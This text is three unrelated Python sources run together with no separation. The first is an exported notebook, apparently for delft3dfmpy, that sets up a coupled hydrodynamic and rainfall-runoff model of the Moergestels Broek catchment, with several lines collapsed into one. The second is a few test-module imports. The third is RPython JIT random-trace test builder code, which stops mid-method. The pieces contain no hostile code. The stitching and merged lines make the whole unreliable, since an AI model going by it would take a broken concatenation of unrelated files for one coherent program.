# Upstream discharge and downstream water level boundaries (RD coordinates)
dfmmodel.external_forcings.add_boundary_condition(
    name='BC_flow_in', pt=(140712.056047, 391893.277878), bctype='discharge', series=bcs['Discharge']
)
dfmmodel.external_forcings.add_boundary_condition(
    name='BC_wlev_down', pt=(141133.788766, 395441.748424), bctype='waterlevel', series=bcs['Waterlevel']
)


# In[16]:


fig, ax = plt.subplots()
ax.plot(
    dfmmodel.external_forcings.boundaries['BC_flow_in']['time'],
    dfmmodel.external_forcings.boundaries['BC_flow_in']['value'],
    label='Discharge [m3/s]'
)
ax.plot(
    dfmmodel.external_forcings.boundaries['BC_wlev_down']['time'],
    dfmmodel.external_forcings.boundaries['BC_wlev_down']['value'],
    label='Water level [m+NAP]'
)
ax.set_ylabel('Value (discharge or waterlevel)')
ax.set_xlabel('Time [minutes]')
ax.legend();


# In[17]:


# Initial water depth is set to 0.5 m
dfmmodel.external_forcings.set_initial_waterdepth(0.5)


# Lateral flow can be obtained from the coupling with the RR-model, or by providing time series. Here, these are read from a Sobek model. In the coupling below, nodes that are not linked to a RR-boundary node are assumed to have a prescribed time series.
#
# If a DFM-model is run offline, timeseries should be provided for all laterals.

# In[18]:


# For adding the lateral inflow we import SOBEK results. To do so we use hkvsobekpy. For more info on this module, see: https://github.com/HKV-products-services/hkvsobekpy
# Note that the column names in the his-file need to match the id's of the
# imported lateral locations at the top of this notebook.
rehis = hkvsobekpy.read_his.ReadMetadata(pad+'sobekdata/QLAT.HIS', hia_file='auto')
# take the first parameter whose name contains 'disch' (discharge)
param = [p for p in rehis.GetParameters() if 'disch' in p][0]
lateral_discharge = rehis.DataFrame().loc[:, param]
# this lateral is not present in the model; drop its series
lateral_discharge.drop('lat_986', inplace=True, axis=1)


# ### Generating the RR-model
# Catchments are provided as HyDAMO files and are read similarly as the FM files are. They can be GML or shape files. Note that in case of shapefiles column mapping is necessary because the column names are truncated. Required columns include 'code' as the ID and 'lateraleknoopcode' as the associated FM boundary node ID. Furthermore, the attribute 'check_geotype' needs to be set. Default is true; and then the reading will fail if the file contains 'MultiPolygon' objects. By disabling the check, these objects will be skipped.
#
# For every catchment, the land use areas will be calculated and if appropriate a maximum of four RR-nodes will be created per catchment:
# - unpaved (based on the Ernst concept)
# - paved
# - greenhouse
# - open water (not the full Sobek2 open water, but only used to transfer (net) precipitation that falls on open water that is schematized in RR to the 1D/2D network.
#
# At the moment, two options exist for the schematisation of the paved area:
# 1) simple: the paved fraction of each catchment is modelled with a paved node, directly connected to catchments' boundary node
# 2) more complex: sewer area polygons and overflow points are used as input as well. For each sewer area, the paved areas in the intersecting catchments are summed. This total area is then distributed over the overflows that are associated with the sewerarea (the column 'lateraleknoopcode') using the area fraction (column 'fractie') for each overflow. In each catchment, paved area that does not intersect with a sewer area gets an unpaved node as in option (1).

# In[19]:


# RR-catchments; check_geotype=False skips MultiPolygon records instead of failing
hydamo.catchments.read_shp(pad+'gml/afvoergebied_2.shp', index_col='code', clip=None,
                           check_geotype=False,
                           column_mapping={'lateralekn' : 'lateraleknoopcode', 'administra':'administratiefgebied'})


# Optionally, read also sewer areas and overflow locations. If sewer-areas are used, there must also be overflows and vice versa.

# In[20]:


hydamo.sewer_areas.read_shp(pad+'gml/rioleringsgebieden.shp', index_col='code', clip=None, check_geotype=False)
hydamo.overflows.read_shp(pad+'gml/overstorten.shp', index_col='code', clip=None,
                          column_mapping={'codegerel':'codegerelateerdobject', 'Naam':'name' })
# snap the overflows to 1D branches
hydamo.overflows.snap_to_branch(hydamo.branches, snap_method='overal', maxdist= 5)


# Other input data for RR can be fed by rasters (from which zonal statistics will be extracted) or spatially uniform default values. Three rasters are required: land use, soil type and surface elevation. For each land use type, the area within each catchment is calculated. Surface level is calculated as the median within the catchment, and the most-occurring soil type is used. In all rasters, a NODATA-value of -999 should be used.

# #### Boundary nodes
# Boundary nodes are assumed to be also included in the FM-model. For every catchment, the boundary identified by 'lateraleknoopcode' in the catchment definition is assumed to exist in the laterals. The coordinates are included in the topology of the model as follows:

# An RR-model must first be initialized:

# In[21]:


drrmodel = DFlowRRModel()


# And the necessary (i.e. the ones with a catchment associated to them) lateral nodes are also loaded into the RR model. Overflows are optional and can be left out.

# In[22]:


drrmodel.external_forcings.io.boundary_from_input(hydamo.laterals, hydamo.catchments, overflows=hydamo.overflows)


# Eventually, water levels can be read from 1D grid points. For now, an observation point is needed for RR to read water levels from. We add an observation point for each boundary with a catchment, with an offset of 1 m horizontally and vertically. The new point is then snapped to the branch.

# In[23]:


names = []
points = []
from shapely.geometry import Point
# boundary_nodes maps node-id -> dict with at least 'id', 'px', 'py'
# (presumably RD x/y coordinates as strings -- TODO confirm)
for i in drrmodel.external_forcings.boundary_nodes.items():
    names.append('obs_'+i[1]['id'])
    points.append(Point((float(i[1]['px'])+1., float(i[1]['py'])+1.)))
dfmmodel.observation_points.add_points(points, names, snap_to_1d=True)


# The coupling of RR and FM must be online: RR reads waterlevels from FM observation points and FM gets discharges from lateral nodes of discharge type 'realtime'. In the call to the function, the overflow locations are appended to the regular lateral locations, so they will be treated the same.
# In[24]:


# Couple laterals (regular laterals + overflows) to the RR boundary nodes;
# nodes without an RR boundary fall back to the SOBEK discharge time series.
dfmmodel.external_forcings.io.read_laterals(hydamo.laterals.append(hydamo.overflows),
                                            lateral_discharges=lateral_discharge,
                                            rr_boundaries=drrmodel.external_forcings.boundary_nodes)


# #### Unpaved nodes
# The coding for the land use types needs to be as follows:<br>
# 1 potatoes <br>
# 2 wheat<br>
# 3 sugar beet<br>
# 4 corn <br>
# 5 other crops <br>
# 6 bulbous plants<br>
# 7 orchard<br>
# 8 grass <br>
# 9 deciduous forest <br>
# 10 coniferous forest<br>
# 11 nature<br>
# 12 barren<br>
# 13 open water<br>
# 14 built-up<br>
# 15 greenhouses<br>
#
# For classes 1-12, the areas are calculated from the provided raster and remapped to the classification in the Sobek RR-tables.
#
#
# The coding for the soil types:<br>
# 1 'Veengrond met veraarde bovengrond'<br>
# 2 'Veengrond met veraarde bovengrond, zand'<br>
# 3 'Veengrond met kleidek'<br>
# 4 'Veengrond met kleidek op zand'<br>
# 5 'Veengrond met zanddek op zand'<br>
# 6 'Veengrond op ongerijpte klei'<br>
# 7 'Stuifzand'<br>
# 8 'Podzol (Leemarm, fijn zand)'<br>
# 9 'Podzol (zwak lemig, fijn zand)'<br>
# 10 'Podzol (zwak lemig, fijn zand op grof zand)'<br>
# 11 'Podzol (lemig keileem)'<br>
# 12 'Enkeerd (zwak lemig, fijn zand)'<br>
# 13 'Beekeerd (lemig fijn zand)'<br>
# 14 'Podzol (grof zand)'<br>
# 15 'Zavel'<br>
# 16 'Lichte klei'<br>
# 17 'Zware klei'<br>
# 18 'Klei op veen'<br>
# 19 'Klei op zand'<br>
# 20 'Klei op grof zand'<br>
# 21 'Leem'<br>
#
#
# And surface elevation needs to be in cm+NAP.

# In[25]:


# all data and settings to create the RR-model
lu_file = pad+'rasters/lgn250.tif'
ahn_file = pad+'rasters/ahn_250_cm.tif'
soil_file = pad+'rasters/soiltypes250.tif'


# Other parameters can be set by rasters (i.e. spatially distributed) or uniform. If a number is provided, the module will use this number for all catchments, if a string is provided it is interpreted as a raster file name. For unpaved nodes, these parameters are the storage on the surface, the infiltration capacity, and the initial ground water depth (in m below the surface). The parametrisation for Ernst is taken from a list of layer depths, where each depth is assigned the corresponding resistance from the list of layer_resistances. They need to be of equal length.

# In[26]:


surface_storage = 10.0
infiltration_capacity = 100.0
initial_gwd = 0.4
# Ernst drainage: resistance per depth layer (equal-length lists)
layer_depths = [0.0, 1.0, 2.0]
layer_resistances = [30,200,10000]


# Fill the unpaved node with the corresponding ernst definition as follows.
#
# The argument 'meteo_areas' to 'unpaved_from_input' contains the polygons that correspond to a meteo-station: here these are identical to each catchment so each catchment gets its own station. If there are many, small, catchments, it might be more appropriate to use, for instance, Thiessen polygons around gauges. For each catchment, the meteo-station is based on the 'meteo-area'-feature in which the centroid of the catchment falls.
#
# The argument 'zonalstats_alltouched' is rather important. It defines the number of cells in the input rasters that are taken into account for each catchment. If the raster resolution is sufficiently high, its setting does not matter. In the case of coarse rasters, small catchments might end up with no nodes at all if 'zonalstats_alltouched' is FALSE - it says that only cells that are entirely within the catchment are taken into account. If it is TRUE, all cells that are touched by the catchment are taken into account - i.e. some pixels might be counted multiple times. Note that to define average fluxes (meteo, seepage, storages) zonalstats_alltouched is TRUE by default. For elevation, land use and soil types it is FALSE by default, if the argument is omitted.
# In[27]: meteo_areas = hydamo.catchments # In[28]: drrmodel.unpaved.io.unpaved_from_input(hydamo.catchments, lu_file, ahn_file, soil_file, surface_storage, infiltration_capacity, initial_gwd, meteo_areas, zonalstats_alltouched=True) drrmodel.unpaved.io.ernst_from_input(hydamo.catchments, depths=layer_depths, resistance=layer_resistances) # #### Paved # Input for the paved nodes are land use -the area of the paved node is the area of class '14' in the provided land use map- and surface elevation. In addition, the following parameters can all be numbers (spatially uniform) or raster filenames: # - storage on the street <br> # - storage in the sewer system <br> # - capacity of the sewerpumps <br> # # The meteo-station is assigned in the same way as for unpaved nodes. # In[29]: street_storage = 10.0 sewer_storage = pad+'rasters/sewstor.tif' pumpcapacity = pad+'rasters/pumpcap.tif' # To convert to a model definition, according to the more complex schematistion: # In[30]: drrmodel.paved.io.paved_from_input(catchments=hydamo.catchments, overflows=hydamo.overflows, sewer_areas=hydamo.sewer_areas, landuse=lu_file, surface_level=ahn_file, street_storage=street_storage, sewer_storage=sewer_storage, pump_capacity=pumpcapacity, meteo_areas=meteo_areas, zonalstats_alltouched=True) Or, according to the simplest approach: # In[31]: # drrmodel.paved.io.paved_from_input(catchments=hydamo.catchments, # landuse=lu_file, # surface_level=ahn_file, # street_storage=street_storage, # sewer_storage=sewer_storage, # pump_capacity=pumpcapacity, # meteo_areas=meteo_areas) # #### Greenhouse nodes # Input for the greenhouse nodes are (again) land use -the area of the paved node is the area of class '15' in the provided land use map- and surface elevation. In addition, the following parameter can be a number (spatially uniform) or a raster filename: # - storage on the roof <br> # # The meteo-station is assigned in the same way as for unpaved nodes. 
# In[32]: roof_storage = pad+'rasters/roofstor.tif' # To convert to a model definition: # In[33]: drrmodel.greenhouse.io.greenhouse_from_input(hydamo.catchments, lu_file, ahn_file, roof_storage, meteo_areas, zonalstats_alltouched=True) # #### Open water # Input for the open water nodes are only land use -the area of the paved node is the area of class '13' in the provided land use map. # # The meteo-station is assigned in the same way as for unpaved nodes. # In[34]: drrmodel.openwater.io.openwater_from_input(hydamo.catchments, lu_file, meteo_areas, zonalstats_alltouched=True) # #### External forcings # # Three types of external forcing need to be provided:<br> # - Seepage/drainage # - Precipitation # - Evaporation # # All are assumed to be spatially variable and thus need to pe provided as rasters per time step. Only the locations of the folders containing the rasters need to be provided; the time step is then derived from the file names. # # All fluxes are assumed to be in mm/d. As for evaporation only one meteostation is used, the meteo_areas are dissolved to a user-defined field that should be available in the table. # # Rastertypes can be any type that is recognized by rasterio (in any case Geotiff and ArcASCII rasters). If the file extension is 'IDF', as is the case in Modflow output, the raster is read using the 'imod'-package. 
# # In[35]: seepage_folder = pad+'rasters/kwel' precip_folder = pad+'rasters/precip' evap_folder = pad+'rasters/evap' # In[36]: drrmodel.external_forcings.io.seepage_from_input(hydamo.catchments, seepage_folder) drrmodel.external_forcings.io.precip_from_input(meteo_areas, precip_folder) drrmodel.external_forcings.io.evap_from_input(meteo_areas, evap_folder, dissolve_field='administratiefgebied') # We need a function to be able to easily plot all nodes and links # In[37]: def node_geometry(dict): # Function to put the node geometries in geodataframes from shapely.geometry import Point geoms = [] links = [] for i in dict.items(): if 'ar' in i[1]: if np.sum([float(s) for s in i[1]['ar'].split(' ')])>0: geoms.append(Point((float(i[1]['px']),float(i[1]['py'])))) links.append(LineString((Point(float(i[1]['px']),float(i[1]['py'])), Point(float(drrmodel.external_forcings.boundary_nodes[i[1]['boundary_node']]['px']), float(drrmodel.external_forcings.boundary_nodes[i[1]['boundary_node']]['py']))))) else: geoms.append(Point((float(i[1]['px']),float(i[1]['py'])))) return((gpd.GeoDataFrame(geoms,columns=['geometry'])),gpd.GeoDataFrame(links,columns=['geometry'])) # Now all the nodes are filled. The topology is defined as follows: every catchment gets a maximum of four nodes (unpaved, paved, open water and greenhouse). If in the land use map, the appropriate land use does not occur in the catchment, no node is defined. The four nodes are plotted on a horizontal (west-east) line around the catchment centroid in the order of: openwater, unpaved, paved, greenhouse. Every node is connected with the lateral node of the catchnment using a RR-link. The files 3B_NOD.TP and 3B_LINK.TP are created describing this. 
# In[38]:

# Plot the generated RR topology (catchments, channels, and the RR nodes/links
# produced by node_geometry) on top of a georeferenced background image.
## plt.rcParams['axes.edgecolor'] = 'w'
import matplotlib.patches as mpatches

fig, ax = plt.subplots(figsize=(10, 10))
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
# Fixed extent of the Moergestels Broek study area (RD New coordinates).
ax.set_xlim(139600, 142400)
ax.set_ylim(391700, 395600)
achtergrond = plt.imread(pad+'gis/achtergrond.png')
ax.imshow(achtergrond, extent=(139517.12, 142957.76, 391606.8, 395907.6),
          interpolation='lanczos')
hydamo.catchments.plot(ax=ax, label='Catchments', edgecolor='black',
                       facecolor="pink", alpha=0.5)
hydamo.branches.plot(ax=ax, label='Channel')
# For each RR node type: index [0] of node_geometry is the node points,
# index [1] the RR links towards the boundary node.
node_geometry(drrmodel.unpaved.unp_nodes)[0].plot(ax=ax, markersize=15,
                                                  color='green', label='Unpaved')
node_geometry(drrmodel.unpaved.unp_nodes)[1].plot(ax=ax, color='black',
                                                  linewidth=0.5)
node_geometry(drrmodel.paved.pav_nodes)[0].plot(ax=ax, markersize=15,
                                                color='red', label='Paved')
node_geometry(drrmodel.paved.pav_nodes)[1].plot(ax=ax, color='black',
                                                linewidth=0.5)
node_geometry(drrmodel.greenhouse.gh_nodes)[0].plot(ax=ax, markersize=15,
                                                    color='yellow', label='Greenhouse')
node_geometry(drrmodel.greenhouse.gh_nodes)[1].plot(ax=ax, color='black',
                                                    linewidth=0.5)
node_geometry(drrmodel.openwater.ow_nodes)[0].plot(ax=ax, markersize=15,
                                                   color='blue', label='Openwater')
node_geometry(drrmodel.external_forcings.boundary_nodes)[0].plot(
    ax=ax, markersize=15, color='purple', label='RR Boundary')
node_geometry(drrmodel.openwater.ow_nodes)[1].plot(ax=ax, color='black',
                                                   linewidth=0.5, label='RR-link')

# manually add handles for polygon plot
handles, labels = ax.get_legend_handles_labels()
poly = mpatches.Patch(facecolor='pink', edgecolor='black', alpha=0.5)
# BUG FIX: list.append() mutates in place and returns None, so the original
# ax.legend(handles=handles.append(poly), labels=labels.append('Catchments'))
# passed None for both arguments.  Build new lists instead.
ax.legend(handles=handles + [poly], labels=labels + ['Catchments'])
fig.tight_layout()

# ### Settings and writing
#
# Finally, we adjust some settings and export the coupled FM-RR model. For more info on the settings: https://content.oss.deltares.nl/delft3d/manuals/D-Flow_FM_User_Manual.pdf
#
# The 1D/2D model (FM) is written to the sub-folder 'fm'; RR-files are written to 'rr'.
An XML-file (dimr-config.xml) describes the coupling between the two. Note that both the GUI and Interaktor do not (yet) support RR, so the only way to carry out a coupled simulation is using DIMR. # # In[39]: # Runtime and output settings # for FM model dfmmodel.mdu_parameters['refdate'] = 20000101 dfmmodel.mdu_parameters['tstart'] = 0.0 * 3600 dfmmodel.mdu_parameters['tstop'] = 24.0 * 1 * 3600 dfmmodel.mdu_parameters['hisinterval'] = '120. 0. 0.' dfmmodel.mdu_parameters['cflmax'] = 0.7 # for RR model drrmodel.d3b_parameters['Timestepsize'] = 300 drrmodel.d3b_parameters['StartTime'] = '2000/01/01;00:00:00' drrmodel.d3b_parameters['EndTime'] = '2000/01/02;00:00:00' drrmodel.d3b_parameters['RestartIn'] = 0 drrmodel.d3b_parameters['RestartOut'] = 0 drrmodel.d3b_parameters['RestartFileNamePrefix'] ='Test' drrmodel.dimr_path = r'c:\users\hurkmans\appdata\local\continuum\anaconda3\lib\site-packages\delft3dfmpy\data\x64\dimr\scripts\run_dimr.bat' # Create writer fm_writer = DFlowFMWriter(dfmmodel, output_dir=pad+'testmodel', name='moergestels_broek') rr_writer = DFlowRRWriter(drrmodel, output_dir=pad+'testmodel', name='moergestels_broek') # Write as model # The ldb is just for visualising in the interaktor - there is no RR component there. fm_writer.objects_to_ldb() fm_writer.write_all() rr_writer.write_all() # Finished! Start the coupled model by clicking run.bat in the output model. # In[ ]:
from test.job_parameters.test_load_job_parameters import TestLoadJobParameters from test.job_parameters.test_flatten_parameter_dictionary import TestFlattenParameterDictionary from test.job_parameters.test_log_param import TestLogParam from test.job_parameters.test_log_params import TestLogParams
from __future__ import print_function
import py
from rpython.rtyper.lltypesystem import lltype, llmemory, rffi, rstr
from rpython.rtyper import rclass
from rpython.jit.backend.test import test_random
from rpython.jit.backend.test.test_random import getint, getref_base, getref
from rpython.jit.metainterp.resoperation import ResOperation, rop, optypes
from rpython.jit.metainterp.history import ConstInt, ConstPtr, getkind
from rpython.jit.metainterp.support import ptr2int
from rpython.jit.codewriter import heaptracker
from rpython.jit.codewriter.effectinfo import EffectInfo
from rpython.rtyper.annlowlevel import llhelper
from rpython.rlib.rarithmetic import intmask
from rpython.rtyper.llinterp import LLException


class LLtypeOperationBuilder(test_random.OperationBuilder):
    """Random-trace builder specialised for lltype: adds random structs,
    arrays, strings and vtables to the generic OperationBuilder.

    NOTE(review): all `r.random()`/`r.choice()` calls are order-sensitive —
    reordering any of them changes the generated trace for a given seed.
    """
    HAVE_SHORT_FIELDS = False

    def __init__(self, *args, **kw):
        test_random.OperationBuilder.__init__(self, *args, **kw)
        self.vtable_counter = 0
        # note: rstrs and runicodes contain either new local strings, or
        # constants. In other words, all BoxPtrs here were created earlier
        # by the trace before, and so it should be kind of fine to mutate
        # them with strsetitem/unicodesetitem.
        self.rstrs = []
        self.runicodes = []
        self.structure_types = []
        self.structure_types_and_vtables = []

    def fork(self, cpu, loop, vars):
        # Forked builders share the cached type lists with their parent.
        fork = test_random.OperationBuilder.fork(self, cpu, loop, vars)
        fork.structure_types = self.structure_types
        fork.structure_types_and_vtables = self.structure_types_and_vtables
        return fork

    def _choose_ptr_vars(self, from_, type, array_of_structs):
        # Filter (var, TYPE) pairs: keep those matching `type` and whose
        # array-of-structs-ness equals `array_of_structs`.
        ptrvars = []
        for i in range(len(from_)):
            v, S = from_[i][:2]
            if not isinstance(S, type):
                continue
            if ((isinstance(S, lltype.Array) and
                 isinstance(S.OF, lltype.Struct)) == array_of_structs):
                ptrvars.append((v, S))
        return ptrvars

    def get_structptr_var(self, r, must_have_vtable=False, type=lltype.Struct,
                          array_of_structs=False):
        """Pick (or randomly create) a pointer variable of the wanted kind.

        Loops until the picked struct has a vtable when one is required
        (a struct with a vtable has 'parent' as its first field name).
        """
        while True:
            ptrvars = self._choose_ptr_vars(self.ptrvars, type,
                                            array_of_structs)
            if ptrvars and r.random() < 0.8:
                v, S = r.choice(ptrvars)
            else:
                prebuilt_ptr_consts = self._choose_ptr_vars(
                    self.prebuilt_ptr_consts, type, array_of_structs)
                if prebuilt_ptr_consts and r.random() < 0.7:
                    v, S = r.choice(prebuilt_ptr_consts)
                else:
                    if type is lltype.Struct:
                        # create a new constant structure
                        must_have_vtable = must_have_vtable or r.random() < 0.5
                        p = self.get_random_structure(r,
                                                has_vtable=must_have_vtable)
                    else:
                        # create a new constant array
                        p = self.get_random_array(r,
                                    must_be_array_of_structs=array_of_structs)
                    S = lltype.typeOf(p).TO
                    v = ConstPtr(lltype.cast_opaque_ptr(llmemory.GCREF, p))
                    self.prebuilt_ptr_consts.append((v, S,
                                                     self.field_values(p)))
            if not (must_have_vtable and S._names[0] != 'parent'):
                break
        return v, S

    def get_arrayptr_var(self, r):
        return self.get_structptr_var(r, type=lltype.Array)

    def get_random_primitive_type(self, r):
        # Pick one of Signed/Char/UCHAR/SHORT with equal probability;
        # SHORT falls back to Signed unless HAVE_SHORT_FIELDS is enabled.
        rval = r.random()
        if rval < 0.25:
            TYPE = lltype.Signed
        elif rval < 0.5:
            TYPE = lltype.Char
        elif rval < 0.75:
            TYPE = rffi.UCHAR
        else:
            TYPE = rffi.SHORT
            if not self.HAVE_SHORT_FIELDS:
                TYPE = lltype.Signed
        return TYPE

    def get_random_structure_type(self, r, with_vtable=None, cache=True,
                                  type=lltype.GcStruct):
        """Return a (possibly cached) random struct type with 1-4 fields.

        Field names encode their kind: 'r<i>' for GC refs, 'i<i>' for ints.
        """
        if cache and self.structure_types and r.random() < 0.5:
            return r.choice(self.structure_types)
        fields = []
        kwds = {}
        if with_vtable:
            fields.append(('parent', rclass.OBJECT))
            kwds['hints'] = {'vtable': with_vtable._obj}
        for i in range(r.randrange(1, 5)):
            if r.random() < 0.1:
                kind = 'r'
                TYPE = llmemory.GCREF
            else:
                kind = 'i'
                TYPE = self.get_random_primitive_type(r)
            fields.append(('%s%d' % (kind, i), TYPE))
        S = type('S%d' % self.counter, *fields, **kwds)
        self.counter += 1
        if cache:
            self.structure_types.append(S)
        return S

    def get_random_structure_type_and_vtable(self, r):
        # Either reuse a cached (struct, vtable) pair, or make a fresh
        # vtable with a unique subclassrange and register it for testing.
        if self.structure_types_and_vtables and r.random() < 0.5:
            return r.choice(self.structure_types_and_vtables)
        vtable = lltype.malloc(rclass.OBJECT_VTABLE, immortal=True)
        vtable.subclassrange_min = self.vtable_counter
        vtable.subclassrange_max = self.vtable_counter
        self.vtable_counter += 1
        S = self.get_random_structure_type(r, with_vtable=vtable, cache=False)
        name = S._name
        heaptracker.set_testing_vtable_for_gcstruct(S, vtable, name)
        self.structure_types_and_vtables.append((S, vtable))
        #
        return S, vtable

    def get_random_structure(self, r, has_vtable=False):
        # Allocate an instance of a random struct type and fill all
        # non-'parent' fields with random integers of the right type.
        if has_vtable:
            S, vtable = self.get_random_structure_type_and_vtable(r)
            p = lltype.malloc(S)
            p.parent.typeptr = vtable
        else:
            S = self.get_random_structure_type(r)
            p = lltype.malloc(S)
        for fieldname in lltype.typeOf(p).TO._names:
            if fieldname != 'parent':
                TYPE = getattr(S, fieldname)
                setattr(p, fieldname, rffi.cast(TYPE, r.random_integer()))
        return p

    def get_random_array_type(self, r, can_be_array_of_struct=False,
                              must_be_array_of_structs=False):
        if ((can_be_array_of_struct and r.random() < 0.1) or
            must_be_array_of_structs):
            TYPE = self.get_random_structure_type(r, cache=False,
                                                  type=lltype.Struct)
        else:
            TYPE = self.get_random_primitive_type(r)
        return lltype.GcArray(TYPE)

    def get_random_array(self, r, must_be_array_of_structs=False):
        # Allocate a random-length array and fill every item (or every
        # struct field of every item) with random values.
        A = self.get_random_array_type(r,
                       must_be_array_of_structs=must_be_array_of_structs)
        length = (r.random_integer() // 15) % 300  # length: between 0 and 299
                                                   # likely to be small
        p = lltype.malloc(A, length)
        if isinstance(A.OF, lltype.Primitive):
            for i in range(length):
                p[i] = rffi.cast(A.OF, r.random_integer())
        else:
            for i in range(length):
                for fname, TP in A.OF._flds.items():
                    setattr(p[i], fname, rffi.cast(TP, r.random_integer()))
        return p

    def get_index(self, length, r):
        """Return a variable or constant holding a valid index < length."""
        if length == 0:
            raise test_random.CannotProduceOperation
        v_index = r.choice(self.intvars)
        if not (0 <= getint(v_index) < length):
            # if the preferred variant doesn't work, use a constant
            v_index = ConstInt(r.random_integer() % length)
        return v_index

    def field_values(self, p):
        # Snapshot all field (or item) values of a prebuilt struct/array,
        # keyed by field name (structs) or index (arrays).
        dic = {}
        S = lltype.typeOf(p).TO
        if isinstance(S, lltype.Struct):
            for fieldname in S._names:
                if fieldname != 'parent':
                    dic[fieldname] = getattr(p, fieldname)
        else:
            assert isinstance(S, lltype.Array)
            if isinstance(S.OF, lltype.Struct):
                for i in range(len(p)):
                    item = p[i]
                    s1 = {}
                    for fieldname in S.OF._names:
                        s1[fieldname] = getattr(item, fieldname)
                    dic[i] = s1
            else:
                for i in range(len(p)):
                    dic[i] = p[i]
        return dic

    def print_loop_prebuilt(self, names, writevar, s):
        # Emit Python source that re-creates the prebuilt constants, for
        # reproducing a failing random test as a standalone script.
        written = {}
        for v, S, fields in self.prebuilt_ptr_consts:
            if S not in written:
                print('    %s = lltype.GcStruct(%r,' % (S._name, S._name),
                      file=s)
                for name in S._names:
                    if name == 'parent':
                        print("              ('parent', rclass.OBJECT),",
                              file=s)
                    else:
                        print('              (%r, lltype.Signed),' % (name,),
                              file=s)
                print('              )', file=s)
                if S._names[0] == 'parent':
                    print('    %s_vtable = lltype.malloc(rclass.OBJECT_VTABLE, immortal=True)' % (S._name,), file=s)
                written[S] = True
            print('    p = lltype.malloc(%s)' % (S._name,), file=s)
            if S._names[0] == 'parent':
                print('    p.parent.typeptr = %s_vtable' % (S._name,), file=s)
            for name, value in fields.items():
                print('    p.%s = %d' % (name, value), file=s)
            writevar(v, 'preb', 'lltype.cast_opaque_ptr(llmemory.GCREF, p)')

# ____________________________________________________________

class GuardClassOperation(test_random.GuardOperation):
    """Produce a GUARD_CLASS; returns (op, whether the guard passes)."""
    def gen_guard(self, builder, r):
        ptrvars = [(v, S) for (v, S) in builder.ptrvars
                   if isinstance(S, lltype.Struct) and
                      S._names[0] == 'parent']
        if not ptrvars:
            raise test_random.CannotProduceOperation
        v, S = r.choice(ptrvars)
        if r.random() < 0.3:
            # 30%: guard against the object's own class (guard passes)
            v2, S2 = v, S
        else:
            v2, S2 = builder.get_structptr_var(r, must_have_vtable=True)
        vtable = S._hints['vtable']._as_ptr()
        vtable2 = S2._hints['vtable']._as_ptr()
        c_vtable2 = ConstInt(ptr2int(vtable2))
        op = ResOperation(self.opnum, [v, c_vtable2], None)
        return op, (vtable == vtable2)

class GuardNonNullClassOperation(GuardClassOperation):
    """Like GUARD_CLASS, but half the time tests against a NULL pointer
    (which always fails a GUARD_NONNULL_CLASS)."""
    def gen_guard(self, builder, r):
        if r.random() < 0.5:
            return GuardClassOperation.gen_guard(self, builder, r)
        else:
            NULL = lltype.nullptr(llmemory.GCREF.TO)
            op = ResOperation(rop.SAME_AS_R, [ConstPtr(NULL)])
            builder.loop.operations.append(op)
            v2, S2 = builder.get_structptr_var(r, must_have_vtable=True)
            vtable2 = S2._hints['vtable']._as_ptr()
            c_vtable2 = ConstInt(ptr2int(vtable2))
            op = ResOperation(self.opnum, [op, c_vtable2], None)
            return op, False

class ZeroPtrFieldOperation(test_random.AbstractOperation):
    """Zero out a (Signed-typed stand-in for a) pointer field by offset."""
    def field_descr(self, builder, r):
        if getattr(builder.cpu, 'is_llgraph', False):
            raise test_random.CannotProduceOperation
        v, S = builder.get_structptr_var(r, )
        names = S._names
        if names[0] == 'parent':
            names = names[1:]
        choice = []
        for name in names:
            FIELD = getattr(S, name)
            if FIELD is lltype.Signed:  # xxx should be a gc ptr, but works too
                choice.append(name)
        if not choice:
            raise test_random.CannotProduceOperation
        name = r.choice(choice)
        descr = builder.cpu.fielddescrof(S, name)
        return v, descr.offset

    def produce_into(self, builder, r):
        v, offset = self.field_descr(builder, r)
        builder.do(self.opnum, [v, ConstInt(offset)], None)

class GetFieldOperation(test_random.AbstractOperation):
    """Produce a GETFIELD_GC_* on a randomly chosen struct field whose
    kind matches the operation's result kind."""
    def field_descr(self, builder, r):
        v, S = builder.get_structptr_var(r, )
        names = S._names
        if names[0] == 'parent':
            names = names[1:]
        choice = []
        kind = optypes[self.opnum]
        for name in names:
            FIELD = getattr(S, name)
            if not isinstance(FIELD, lltype.Ptr):
                if kind == 'n' or getkind(FIELD)[0] == kind:
                    choice.append(name)
        if not choice:
            raise test_random.CannotProduceOperation
        name = r.choice(choice)
        descr = builder.cpu.fielddescrof(S, name)
        descr._random_info = 'cpu.fielddescrof(..., %r)' % (name,)
        descr._random_type = S
        TYPE = getattr(S, name)
        return v, descr, TYPE

    def produce_into(self, builder, r):
        # Retry until a field that is actually initialized is found.
        while True:
            try:
                v, descr, _ = self.field_descr(builder, r)
                self.put(builder, [v], descr)
            except lltype.UninitializedMemoryAccess:
                continue
            break

class GetInteriorFieldOperation(test_random.AbstractOperation):
    """Produce a GETINTERIORFIELD_GC_* on an array-of-structs item."""
    def field_descr(self, builder, r):
        v, A = builder.get_structptr_var(r, type=lltype.Array,
                                         array_of_structs=True)
        array = getref(lltype.Ptr(A), v)
        v_index = builder.get_index(len(array), r)
        choice = []
        for name in A.OF._names:
            FIELD = getattr(A.OF, name)
            if not isinstance(FIELD, lltype.Ptr):
                choice.append(name)
        if not choice:
            raise test_random.CannotProduceOperation
        name = r.choice(choice)
        descr = builder.cpu.interiorfielddescrof(A, name)
        descr._random_info = 'cpu.interiorfielddescrof(..., %r)' % (name,)
        descr._random_type = A
        TYPE = getattr(A.OF, name)
        return v, v_index, descr, TYPE

    def produce_into(self, builder, r):
        while True:
            try:
                v, v_index, descr, _ = self.field_descr(builder, r)
                self.put(builder, [v, v_index], descr)
            except lltype.UninitializedMemoryAccess:
                continue
            break

class SetFieldOperation(GetFieldOperation):
    def produce_into(self, builder, r):
        v, descr, TYPE = self.field_descr(builder, r)
        # Pick a value that round-trips through the field type unchanged,
        # so the stored value can be checked exactly afterwards.
        while True:
            if r.random() < 0.3:
                w = ConstInt(r.random_integer())
            else:
                w = r.choice(builder.intvars)
            value = getint(w)
            if rffi.cast(lltype.Signed, rffi.cast(TYPE, value)) == value:
                break
        builder.do(self.opnum, [v, w], descr)

class SetInteriorFieldOperation(GetInteriorFieldOperation):
    def produce_into(self, builder, r):
        v, v_index, descr, TYPE = self.field_descr(builder, r)
        # Same round-trip constraint as SetFieldOperation.
        while True:
            if r.random() < 0.3:
                w = ConstInt(r.random_integer())
            else:
                w = r.choice(builder.intvars)
            value = getint(w)
            if rffi.cast(lltype.Signed, rffi.cast(TYPE, value)) == value:
                break
